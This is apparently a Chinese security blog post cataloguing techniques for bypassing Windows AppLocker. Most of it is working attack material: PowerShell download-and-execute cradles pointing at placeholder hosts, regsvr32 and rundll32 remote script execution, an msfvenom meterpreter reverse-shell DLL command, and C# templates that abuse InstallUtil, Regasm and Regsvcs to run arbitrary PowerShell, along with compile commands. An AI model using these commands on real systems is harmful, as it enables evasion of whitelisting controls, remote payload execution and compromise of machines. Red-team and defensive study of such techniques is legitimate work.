AppLocker Bypass Techniques

from:https://www.youtube.com/watch?v=z04NXAkhI4k

0x00 Command 和 Powershell 没被禁用,脚本被禁用

1

1、直接使用cmd powershell执行

Powershell:

IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

Command:

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')

2、管道

Powershell:

Get-Content script.ps1 | iex

Command:

cmd.exe /K < payload.bat

3、hta

payload.hta

0

4、Regsvr32.exe

2

regsvr32 /u /n /s /i:payload.sct scrobj.dll
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

payload.sct:

123

5、rundll32

payload:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")

6、dll/cpl

payload.dll

msfvenom -p windows/meterpreter/reverse_tcp -b '\x00\xff' lhost=192.168.127.132 lport=8888 -f dll -o payload.dll

运行:

rundll32 shell32.dll,Control_RunDLL payload.dll

将dll重命名为cpl,双击运行。

7、nishang 文件backdoor

3

nishang client

http://drops.wooyun.org/tips/8568

0x01 可执行目录

4

通过ps脚本扫描可写入的路径

下载地址:http://go.mssec.se/AppLockerBC

扫描可执行路径:

5

绕过AppLocker执行:

6

0x02 禁用powershell以后

7

配置禁用powershell

8

禁用以后再次打开powershell

9

1、通过.Net执行powershell

通过.Net执行powershell进行绕过:

 

10

C# templae

powershell.cs

using System;
using System.Management.Automation;
namespace Powershell
{
    class Program
    {
        static void Main(string[] args)
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();
        }
    }
}

编译exe以后不能直接运行,可以放到可执行目录执行,调用powershell。

2、InstallUtil

11

参考1:http://drops.wooyun.org/tips/8862

参考2: http://drops.wooyun.org/tips/8701

InstallUtil.cs

using System;
using System.Management.Automation;
namespace Whitelist
{
    class Program
    {
        static void Main(string[] args)
        {
        }
    }
}
[System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        //The Methods can be Uninstall/Install.  Install is transactional, and really unnecessary.
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();            
        }
    }

编译以后用/U参数运行:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:InstallUtil.exe InstallUtil.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U InstallUtil.exe

3、Regasm & Regsvcs

12

Regasm.cs

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Management.Automation;
namespace regsvcser
{
    
    public class Bypass : ServicedComponent
    {
        public Bypass() { Console.WriteLine("I am a basic COM Object"); }
        
        [ComUnregisterFunction] //This executes if registration fails
        public static void UnRegisterClass ( string key )
        {
            PowerShell ps = PowerShell.Create();
            ps.AddCommand("Invoke-Expression");
            ps.AddArgument("payload");
            ps.Invoke();    
        }
    }
}

使用方式为:

Create Your Strong Name Key -> key.snk
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Regasm.dll

4、nishang 文件backdoor

虽然powershell被禁用了,但是仍然可执行shellcode。可以使用hta,macro等方式进行。

0x03 提权

提权到管理员权限,即可执行突破AppLocker的限制,执行exe和脚本

【原文作者:evi1cg  mottoin整理发布】

原创文章,作者:Evi1cg,如若转载,请注明出处:http://www.mottoin.com/89491.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code